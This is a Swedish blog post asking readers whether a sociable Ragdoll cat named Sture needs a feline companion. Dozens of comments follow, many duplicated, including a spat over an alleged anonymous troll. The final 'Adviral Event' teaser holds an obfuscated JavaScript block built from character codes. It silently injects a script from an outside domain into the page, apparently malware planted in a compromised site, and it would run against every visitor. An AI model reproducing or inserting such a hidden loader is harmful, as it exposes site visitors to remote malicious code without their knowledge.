Borde jag skaffa en kompis till Sture?

imageAlltså HUR söt?! Ragdoll måste vara den socialaste katten som finns?

Tränar jag hemma hänger han med, duschar jag ligger han utanför, lagar jag mat sitter han brevid, sover jag ligger han PÅ mig! Ska jag åka iväg hoppar han ner i väskan!

Han följer mig vart jag än går…. Villkorslös kärlek! <3

Nu en fråga från mig till dig. Många säger att jag borde skaffat två katter. Så att dom har sällskap av varandra. Vad tycker du? Har du någon erfarenhet av detta?

Kram /My & Sture

97 Komentarer

 1. Ska han va ensam hela dagarna så hade jag skaffat en kompis till honom, men gäller det bara ett par timmar så hade jag inte gjort det ? Ragdoll är ju lite mer av en hund i sinnet. Min va det iallfall ? Å Sture påminner så himla mycket om min ♥ Bomba med fler bilder!

 2. Gud så söt! Ragdoll är nog en av dom sötaste finaste katterna! Han är supersöt Sture. Jag har varit sugen många gånger på en ragdoll men har endast haft siameser/balineser som är otroligt sociala också, gjorde precis så som Sture gör. Dom katterna är det många uppfödare som ej säljer endast en katt till om man inte har en sedan innan eller tänkt skaffa en till som sällskap. Jag kan inget om ragdoll men utgår från att en katt som är väldigt social är i behov av en anna katt som sällskap om man inte är hemma väldigt mycket. Mina två katter som var en hane och hona hade väldigt mycket sällskap av varandra då dom alltid låg och sov tillsammans och lekte men så fort jag var hemma så var honan ALLTID efter mig precis som Sture. Men det var skönt att veta att dom hade varandra om jag var iväg. Lycka till!

 3. Katter är inte som andra djur att dom absolut måste ha en kompis. Genom ganska stor forskning har det bevisats att dom är ”egendjur”, sen inte sagt att dom inte kan trivas med andra katter. Det finns inga krav på att man måste ha 2 katter. Däremot är det enligt jordbruksverket inte tillåtet att inte ha samma tillsyn på katt som hund. 5 timmar sen ska man titta till katten.

 4. Ska han va ensam hela dagarna så hade jag skaffat en kompis till honom, men gäller det bara ett par timmar så hade jag inte gjort det 🙂 Ragdoll är ju lite mer av en hund i sinnet. Min va det iallfall 😉 Å Sture påminner så himla mycket om min ♥ Bomba med fler bilder!

 5. Jag skulle absolut skaffa en kattkompis, speciellt med tanke på att du
  är borta hela dagarna, ett måste helt enkelt för en så social katt,

 6. Gud så söt! Ragdoll är nog en av dom sötaste finaste katterna! Han är supersöt Sture. Jag har varit sugen många gånger på en ragdoll men har endast haft siameser/balineser som är otroligt sociala också, gjorde precis så som Sture gör. Dom katterna är det många uppfödare som ej säljer endast en katt till om man inte har en sedan innan eller tänkt skaffa en till som sällskap. Jag kan inget om ragdoll men utgår från att en katt som är väldigt social är i behov av en anna katt som sällskap om man inte är hemma väldigt mycket. Mina två katter som var en hane och hona hade väldigt mycket sällskap av varandra då dom alltid låg och sov tillsammans och lekte men så fort jag var hemma så var honan ALLTID efter mig precis som Sture. Men det var skönt att veta att dom hade varandra om jag var iväg. Lycka till!

 7. Åh lille gose-Sture som hänger på överallt;-) Tycker inte alls du behöver stressa över en katt-kompis till Sture, han har ju dig och Lilleman (och alla andra som vill ge honom kärlek) Jag växte upp med katter, vi hade alltid bara en (förvisso var dem ute-katter) men de är ju väldigt självgående och egensinniga (och har ju ingen direkt tidsuppfattning) kram till er alla

  • Kul att höra =) Men Sture är inne katt. jag tänker om det är ensamt när vi är på dagis/jobb….. Hmm, ska fundera lite till. Kram från oss <3

 8. Katter är inte som andra djur att dom absolut måste ha en kompis. Genom ganska stor forskning har det bevisats att dom är ”egendjur”, sen inte sagt att dom inte kan trivas med andra katter. Det finns inga krav på att man måste ha 2 katter. Däremot är det enligt jordbruksverket inte tillåtet att inte ha samma tillsyn på katt som hund. 5 timmar sen ska man titta till katten.

 9. Vi skaffade först en liten raggis men efter ett tag så köpte vi en till. Känns skönt att dom har varandra och dom har kul ihop. Är lika sociala och gosiga även fast dom blev två. Dom är nu 7 och 6 år och är våra små älskade hårbollar. Är mer som hundar än katter.

 10. Tycker absolut att du ska skaffa en kompis till Sture. Har själv haft 3 men fick ta bort 2 av dom och sen ca 3 mån senare skaffa vi våran ragdoll då vi tycker katter är värd sällskap om man är borta större delen av dagarna. ?

 11. Jag skulle absolut skaffa en kattkompis, speciellt med tanke på att du
  är borta hela dagarna, ett måste helt enkelt för en så social katt,

 12. Åh lille gose-Sture som hänger på överallt;-) Tycker inte alls du behöver stressa över en katt-kompis till Sture, han har ju dig och Lilleman (och alla andra som vill ge honom kärlek) Jag växte upp med katter, vi hade alltid bara en (förvisso var dem ute-katter) men de är ju väldigt självgående och egensinniga (och har ju ingen direkt tidsuppfattning) kram till er alla

  • Kul att höra =) Men Sture är inne katt. jag tänker om det är ensamt när vi är på dagis/jobb….. Hmm, ska fundera lite till. Kram från oss <3

 13. Jag hade Ragdoll tidigare som utekatt på landet och det funkade utmärkt att han var själv, inga problem. Kom hem när han hörde vår bil. Vet inte om du kan ha honom som utekatt där du bor, men tänk på att en katt sover större delen av dagen och då spelar det väl ingen roll om dem har sällskap av annan katt, eller hur? Min nuvarande katt har en kompis han leker med utomhus men aldrig att den katten får komma in till oss, de gånger han försökt har våra katt fräst och morrat åt honom.

 14. Vi skaffade först en liten raggis men efter ett tag så köpte vi en till. Känns skönt att dom har varandra och dom har kul ihop. Är lika sociala och gosiga även fast dom blev två. Dom är nu 7 och 6 år och är våra små älskade hårbollar. Är mer som hundar än katter.

 15. Absolut en katt- kompis till Sture. Innekatter mår bra av att ha en kompis och träna alla sina instinkter på. Och två är inte jobbigare än en….

 16. Tycker absolut att du ska skaffa en kompis till Sture. Har själv haft 3 men fick ta bort 2 av dom och sen ca 3 mån senare skaffa vi våran ragdoll då vi tycker katter är värd sällskap om man är borta större delen av dagarna. 🙂

  • Stackars katt?
   På det svarar jag -Stackars lilla fega, falska nättroll som gömmer sig bakom VPN och ”skyddad” identitet.
   Konstigt att du inget en ENDA gång under snart två års tid har kunnat skriva något snällt, eller positivt. Testa att dra på smilbanden en gång. Testa att säga något snällt till någon i din omgivning. Testa att le mot dig själv i degeln. Jag LOVAR du kommer bli positivt överaskas!

   • har inte ens läst din blogg i två år. enda gången jag har kommenterat. Inte speciellt anonymt. de flesta i bloggsfären uppfattar mig som snäll.
    Obstinat du är. degeln? vem är det?
    kramis

    • Jag fattar inte vad du menar. Du är ju dum. Varför skulle det vara synd om katten?
     Jag skrev ovan att katter är egendjur och så är det. Det är klart att man kan ha fler katter men då är det nästan viktigare att man följer regeln, max 5 timmar ensamma, med tanke på att katter har ett helt annat sätt att vara. Klart det går att ha fler än en katt men räkna inte fullt ut med att dom per automatik gillar varandra. Jag har haft katt jämt och har varit uppfödare, men nu har jag själv 2 katter. Det funkar bra men klart att det varit dominansfasoner.

     • kommentaren var roligt menad. Satte en blinkande gubbe efter, samt ett bankande hjärta. Men de kom inte med. Tycker att katten har kommit till ett kärleksfullt hem. Tyckte väldigt mkt om bilden när Sture lade sig vid Mys huvud i sängen.
      Katter är roliga. Tyckte att han var hemskt söt när han låg i väskan.
      Men detta är den tredje totala kommentaren som jag lagt här. Kan förstå att min kommentar uppfattades som krass. Det var ju inte det som var meningen.
      Men att skriva att jag aldrig kommenterat snällt, när jag aldrig tidigare har kommenterat, samt att jag driver runt med olika identiteter, fick mig att bli irriterad. Kände mig smutskastad. Eller kallas det för förtal, eller näthat.
      Är det en märklig represalie, till min kommentar, eller är det ett märkligt missförstånd.?
      Det är en väsentlig skillnad på en ärlig åsikt och integritetskränkning. Det senare pysslar jag inte med.
      kramisar

     • Hej Mickan! Det konstiga är att ditt ip nr förekommit under två års tid. MEN med ett annan mail adress… Nu när jag läser det jag skriver så måste det vara någonting som blivit fel. Jag läser vad du skriver och tror dig. Ingen fara missförstånd är till för att redas ut. Ber om ursäkt att det blev så knas! <3 Kramis

     • Mailen har jag haft sedan 2009, som du ser. Min mail är offentlig. Men ip kan inte stämma. Har bytt abbonemang. Sedan har jag en för telefon, en för padda, samt dator, vilka har bytts. Har hälsat på här då och då. Men ip visas väl bara när man kommenterar. Har mobilt bredband. då byts ip nr ut varje gång jag drar ut modemet. Inte de första siffrorna.
      Men jag har faktiskt aldrig kommenterat. En gång när du skrev om kroppsideal. Kom in via länk via Maggan. Tyckte att inlägget var kanon. Men datorfan muppade sig. Tyckte att du såg så snygg och sund ut. Inget smicker.
      Men då förstår jag. Kanske bra att ta bort mailen från bloggen. Men jag är ständigt inloggad med min blogg från alla grejer. Så jag syns automatiskt när jag besöker bloggar. Jag döljer mig inte. Att kommentera med mitt ansikte kräver inloggningsuppgifter till min blogg.
      Kramis på dig.

 17. Har haft katter/katt i ca 35 år o jag rekommenderar starkt en kompis till din fina kisse. Tror att dom mår väldigt bra av att ha en kompis där hela tiden. Sen finns det självklart undantag men ja det tror jag. Kramisar till dig

 18. Jag hade Ragdoll tidigare som utekatt på landet och det funkade utmärkt att han var själv, inga problem. Kom hem när han hörde vår bil. Vet inte om du kan ha honom som utekatt där du bor, men tänk på att en katt sover större delen av dagen och då spelar det väl ingen roll om dem har sällskap av annan katt, eller hur? Min nuvarande katt har en kompis han leker med utomhus men aldrig att den katten får komma in till oss, de gånger han försökt har våra katt fräst och morrat åt honom.

 19. Katter är olika, liksom vi människor. Men jag tror inte att det är fel med en kompis av samma art. Jag jobbar mycket och märkte att min katt inte mådde bra av att vara ensam så mycket. Så nu har jag två, sedan många år tillbaka. Och inga problem. De har definitivt glädje av varandra. Sedan kan man passa på att göra en god gärning samtidigt, genom att ta en katt från ett katthem, eller så.

  • Ja, verkligen =) Alla katter jag tidigare har haft kom ifrån lite ”trasslig” bakgrund. Hemlösa, skadade, katthem osv… =)Funderar vad som är bäst för Sture =) han är sååå social! =)

 20. Absolut en katt- kompis till Sture. Innekatter mår bra av att ha en kompis och träna alla sina instinkter på. Och två är inte jobbigare än en….

 21. Nääää……det är bara när de är ungar som de tycker det är roligt att busa med varandra.När de är vuxna så har katter inget behov av kattsällskap.Inte mina i alla fall och jag har 5 stycken vuxna katter.De ligger i varstitt hörn och är inte minsta intresserade av varann.

 22. Hej My!
  Vi fick hem två kattungar för en månad sedan och de har sååå roligt tillsammans!
  Men jag tror inte du behöver känna att Sture är ensam, vi har alltid haft endast en katt i taget tidigare och det har gått jättebra!
  Kram Emma

  • Stackars katt?

   På det svarar jag -Stackars lilla fega, falska nättroll som gömmer sig bakom VPN och ”skyddad” identitet.

   Konstigt att du inget en ENDA gång under snart två års tid har kunnat skriva något snällt, eller positivt. Testa att dra på smilbanden en gång. Testa att säga något snällt till någon i din omgivning. Testa att le mot dig själv i degeln. Jag LOVAR du kommer bli positivt överaskas!

   • har inte ens läst din blogg i två år. enda gången jag har kommenterat. Inte speciellt anonymt. de flesta i bloggsfären uppfattar mig som snäll.
    Obstinat du är. degeln? vem är det?
    kramis

    • Jag fattar inte vad du menar. Du är ju dum. Varför skulle det vara synd om katten?

     Jag skrev ovan att katter är egendjur och så är det. Det är klart att man kan ha fler katter men då är det nästan viktigare att man följer regeln, max 5 timmar ensamma, med tanke på att katter har ett helt annat sätt att vara. Klart det går att ha fler än en katt men räkna inte fullt ut med att dom per automatik gillar varandra. Jag har haft katt jämt och har varit uppfödare, men nu har jag själv 2 katter. Det funkar bra men klart att det varit dominansfasoner.

     • kommentaren var roligt menad. Satte en blinkande gubbe efter, samt ett bankande hjärta. Men de kom inte med. Tycker att katten har kommit till ett kärleksfullt hem. Tyckte väldigt mkt om bilden när Sture lade sig vid Mys huvud i sängen.

      Katter är roliga. Tyckte att han var hemskt söt när han låg i väskan.

      Men detta är den tredje totala kommentaren som jag lagt här. Kan förstå att min kommentar uppfattades som krass. Det var ju inte det som var meningen.

      Men att skriva att jag aldrig kommenterat snällt, när jag aldrig tidigare har kommenterat, samt att jag driver runt med olika identiteter, fick mig att bli irriterad. Kände mig smutskastad. Eller kallas det för förtal, eller näthat.
      Är det en märklig represalie, till min kommentar, eller är det ett märkligt missförstånd.?
      Det är en väsentlig skillnad på en ärlig åsikt och integritetskränkning. Det senare pysslar jag inte med.
      kramisar

     • Hej Mickan! Det konstiga är att ditt ip nr förekommit under två års tid. MEN med ett annan mail adress… Nu när jag läser det jag skriver så måste det vara någonting som blivit fel. Jag läser vad du skriver och tror dig. Ingen fara missförstånd är till för att redas ut. Ber om ursäkt att det blev så knas! <3 Kramis

     • Mailen har jag haft sedan 2009, som du ser. Min mail är offentlig. Men ip kan inte stämma. Har bytt abbonemang. Sedan har jag en för telefon, en för padda, samt dator, vilka har bytts. Har hälsat på här då och då. Men ip visas väl bara när man kommenterar. Har mobilt bredband. då byts ip nr ut varje gång jag drar ut modemet. Inte de första siffrorna.
      Men jag har faktiskt aldrig kommenterat. En gång när du skrev om kroppsideal. Kom in via länk via Maggan. Tyckte att inlägget var kanon. Men datorfan muppade sig. Tyckte att du såg så snygg och sund ut. Inget smicker.
      Men då förstår jag. Kanske bra att ta bort mailen från bloggen. Men jag är ständigt inloggad med min blogg från alla grejer. Så jag syns automatiskt när jag besöker bloggar. Jag döljer mig inte. Att kommentera med mitt ansikte kräver inloggningsuppgifter till min blogg.
      Kramis på dig.

 23. Har haft katter/katt i ca 35 år o jag rekommenderar starkt en kompis till din fina kisse. Tror att dom mår väldigt bra av att ha en kompis där hela tiden. Sen finns det självklart undantag men ja det tror jag. Kramisar till dig

 24. Katter är olika, liksom vi människor. Men jag tror inte att det är fel med en kompis av samma art. Jag jobbar mycket och märkte att min katt inte mådde bra av att vara ensam så mycket. Så nu har jag två, sedan många år tillbaka. Och inga problem. De har definitivt glädje av varandra. Sedan kan man passa på att göra en god gärning samtidigt, genom att ta en katt från ett katthem, eller så.

  • Ja, verkligen =) Alla katter jag tidigare har haft kom ifrån lite ”trasslig” bakgrund. Hemlösa, skadade, katthem osv… =)Funderar vad som är bäst för Sture =) han är sååå social! =)

 25. Katter är egendjur som ngn skrev ovan. Att människor ofta tror att katter mår bäst i tvåsamhet är en endast en mänsklig fantasi och har mer med vissa människors egna inbillade behov och inte med katters behov att göra.
  Många katter klarar däremot ofta av att leva tillsammans men det är inte optimalt. En vän till mig hade två katter som vuxit upp tillsammans men när de var ensamma, dominerade den ena katten den andra katten totalt. Ägaren fann den ena katten uppflugen på köksskåpen varje dag efter jobbet där katten fick sitta och gömma sig för den andre. Katten var så stressad till slut av sin livssituation och revirpinkande kompis att den rymde och aldrig mer kom tillbaka.
  Sture är inte ”ensam”. Det är en mänsklig känsla.

 26. Nääää……det är bara när de är ungar som de tycker det är roligt att busa med varandra.När de är vuxna så har katter inget behov av kattsällskap.Inte mina i alla fall och jag har 5 stycken vuxna katter.De ligger i varstitt hörn och är inte minsta intresserade av varann.

 27. Hej My!
  Vi fick hem två kattungar för en månad sedan och de har sååå roligt tillsammans!
  Men jag tror inte du behöver känna att Sture är ensam, vi har alltid haft endast en katt i taget tidigare och det har gått jättebra!
  Kram Emma

 28. Ett tips lyssnar nu på en ljudbok som heter Katter o Döttrar tror den är något för dig. Den är bra kvinnan som skriver har en bok tidigare som också ska vara bra. Men vet inte vad den heter författare heter Helen Brown finns som vanlig bok också. Söt Sture är.

 29. Ragdolls är inte som katter är generellt… Dom är ju supersociala och behöver mycket input! Mycket närhet… Gos… Lek… osv. Har nämnt det förut att seriösa uppfödare mer eller mindre kräver att du har sällskap till katten om du är borta många timmar per dag.
  Vi har två stycken, mor och son som vi fick hem samtidigt i oktober förra året. Fungerar superbra! Skulle nästan säga att lilla sonen skulle behöva en lek-kompis till då mamman inte är så sugen på lek och bus som han är…

 30. Hej. Varför tar du inte anställning som florist på nån blomsterhandel? Med din kunskap och förkärlek till blommor. Då kommer du tillbaka till det du alltid jobbat med. PS! Ett tips är att ha sele istället för halskoppel, då kissen kan göra illa halsen om den springer o busar ute. /Nitis

  • Hej! Jag har ju i dagsläget tre andra jobb. Så det blir lite to much för mig att jobba som flotts också. En florist lön täcker inte upp för mig ekonomiskt.. Samt så känner jag att efter konkursen och i den sorg som jag befinner mig efter denna så behöver jag en paus ifrån branschen. Det händer att jag går in och konsultår emellanåt, men bara om jag känner att jag orkar/vill det. tack för tipset, vi har en sele också =) Kram

 31. Katter är egendjur som ngn skrev ovan. Att människor ofta tror att katter mår bäst i tvåsamhet är en endast en mänsklig fantasi och har mer med vissa människors egna inbillade behov och inte med katters behov att göra.

  Många katter klarar däremot ofta av att leva tillsammans men det är inte optimalt. En vän till mig hade två katter som vuxit upp tillsammans men när de var ensamma, dominerade den ena katten den andra katten totalt. Ägaren fann den ena katten uppflugen på köksskåpen varje dag efter jobbet där katten fick sitta och gömma sig för den andre. Katten var så stressad till slut av sin livssituation och revirpinkande kompis att den rymde och aldrig mer kom tillbaka.

  Sture är inte ”ensam”. Det är en mänsklig känsla.

 32. Ett tips lyssnar nu på en ljudbok som heter Katter o Döttrar tror den är något för dig. Den är bra kvinnan som skriver har en bok tidigare som också ska vara bra. Men vet inte vad den heter författare heter Helen Brown finns som vanlig bok också. Söt Sture är.

 33. Ragdolls är inte som katter är generellt… Dom är ju supersociala och behöver mycket input! Mycket närhet… Gos… Lek… osv. Har nämnt det förut att seriösa uppfödare mer eller mindre kräver att du har sällskap till katten om du är borta många timmar per dag.
  Vi har två stycken, mor och son som vi fick hem samtidigt i oktober förra året. Fungerar superbra! Skulle nästan säga att lilla sonen skulle behöva en lek-kompis till då mamman inte är så sugen på lek och bus som han är…

 34. Hej. Varför tar du inte anställning som florist på nån blomsterhandel? Med din kunskap och förkärlek till blommor. Då kommer du tillbaka till det du alltid jobbat med. PS! Ett tips är att ha sele istället för halskoppel, då kissen kan göra illa halsen om den springer o busar ute. /Nitis

  • Hej! Jag har ju i dagsläget tre andra jobb. Så det blir lite to much för mig att jobba som flotts också. En florist lön täcker inte upp för mig ekonomiskt.. Samt så känner jag att efter konkursen och i den sorg som jag befinner mig efter denna så behöver jag en paus ifrån branschen. Det händer att jag går in och konsultår emellanåt, men bara om jag känner att jag orkar/vill det. tack för tipset, vi har en sele också =) Kram

 35. Vi har två katter som är syskon från samma kull. De är nu snart två år. När de var små hade de väldigt mycket glädje av varandra men nu bryr de sig knappt om varandra… Men jisses så söt lilla Sture är! ?

 36. Det beror ju på vilken kattras man har och om det är inne- eller utekatt.
  Har man ragdolls så bör det vara två kattungar av denna ras, det är inte
  så bra att ta en hemlös katt, som man inte vet någonting om eller hur
  dom fungerar ihop. Det absolut bästa är ju att skaffa en kompis nu, en
  ragdolls kattunge, hona.

 37. Vi har två katter som är syskon från samma kull. De är nu snart två år. När de var små hade de väldigt mycket glädje av varandra men nu bryr de sig knappt om varandra… Men jisses så söt lilla Sture är! 😄

 38. Det beror ju på vilken kattras man har och om det är inne- eller utekatt.
  Har man ragdolls så bör det vara två kattungar av denna ras, det är inte
  så bra att ta en hemlös katt, som man inte vet någonting om eller hur
  dom fungerar ihop. Det absolut bästa är ju att skaffa en kompis nu, en
  ragdolls kattunge, hona.

 39. Katter trivs bäst utan sällskap av annan katt då de inte är flockdjur. Forskning visar att det tom oftast uppstår rivalitet och att katterna delar upp hemmet mellan sig för att slippa stöta på varandra. Det är alltså en myt att katter skulle känna sig ensamma utan sällskap av annat djur. När vi är borta sover de mest. Så låt lilla bedårande Sture få härska i egen majoritet ?.

 40. Katter trivs bäst utan sällskap av annan katt då de inte är flockdjur. Forskning visar att det tom oftast uppstår rivalitet och att katterna delar upp hemmet mellan sig för att slippa stöta på varandra. Det är alltså en myt att katter skulle känna sig ensamma utan sällskap av annat djur. När vi är borta sover de mest. Så låt lilla bedårande Sture få härska i egen majoritet :).

 41. Inte lätt det här??? kanske ska låta det vara ett tag å se hur Sture reagerar eller prata med uppfödaren. Har erfarenhet av både en å två katter å har två just nu men tror att det inte spelar katterna någon roll utan det är mer för min skull (självklart vill jag ju inte vara utan någon av dem nu) men man ska inte förringa sin egen själsliga frid??? kram på dig

 42. Inte lätt det här😊😊😊 kanske ska låta det vara ett tag å se hur Sture reagerar eller prata med uppfödaren. Har erfarenhet av både en å två katter å har två just nu men tror att det inte spelar katterna någon roll utan det är mer för min skull (självklart vill jag ju inte vara utan någon av dem nu) men man ska inte förringa sin egen själsliga frid😊😊😊 kram på dig

 43. Om du är borta under dagarna (som vi normalt är) plus någon kväll osv så tycker jag att du dka skaffa en kompis till Sture, jag har själv en ragdoll och han är super social både med oss och sin kattsyrra, så för mig känns det som en självklarhet att ha två och när jag kommer hem ser jag hur dem två har härjat runt med varandra!

 44. PS ser att många skriver att de bara har nytta av varandra när de är små, mina är 4 respektive 4,5 år nu och leker och myser fortfarande med varandra. DS

 45. Om du är borta under dagarna (som vi normalt är) plus någon kväll osv så tycker jag att du dka skaffa en kompis till Sture, jag har själv en ragdoll och han är super social både med oss och sin kattsyrra, så för mig känns det som en självklarhet att ha två och när jag kommer hem ser jag hur dem två har härjat runt med varandra!

 46. PS ser att många skriver att de bara har nytta av varandra när de är små, mina är 4 respektive 4,5 år nu och leker och myser fortfarande med varandra. DS

 47. Du kommer att märka om Sture behöver en kompis eller inte när det har gått ett tag. Katter visar vad de vill ha och inte ha. Vi har två katter och den äldsta av dem var ensam katt i två år innan han visade tecken på att vara ensam. Lycka till!

 48. Du kommer att märka om Sture behöver en kompis eller inte när det har gått ett tag. Katter visar vad de vill ha och inte ha. Vi har två katter och den äldsta av dem var ensam katt i två år innan han visade tecken på att vara ensam. Lycka till!

 49. Jag har Cornish Rex, också väldigt sociala katter. Började med en katt och köpte efter ett par år en till rex. De leker och sover mycket tillsammans. Ingen rivalitet. Det märks att de har glädje av varandra. Min uppfödare har 6 st Cornish Rex hemma och de ligger ju alltid i en hög tillsammans i klätterträdet, så visst måste de uppskatta varandras sällskap. Annars hade de väl varit på varsina håll i det stora huset.

 50. Jag har Cornish Rex, också väldigt sociala katter. Började med en katt och köpte efter ett par år en till rex. De leker och sover mycket tillsammans. Ingen rivalitet. Det märks att de har glädje av varandra. Min uppfödare har 6 st Cornish Rex hemma och de ligger ju alltid i en hög tillsammans i klätterträdet, så visst måste de uppskatta varandras sällskap. Annars hade de väl varit på varsina håll i det stora huset.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/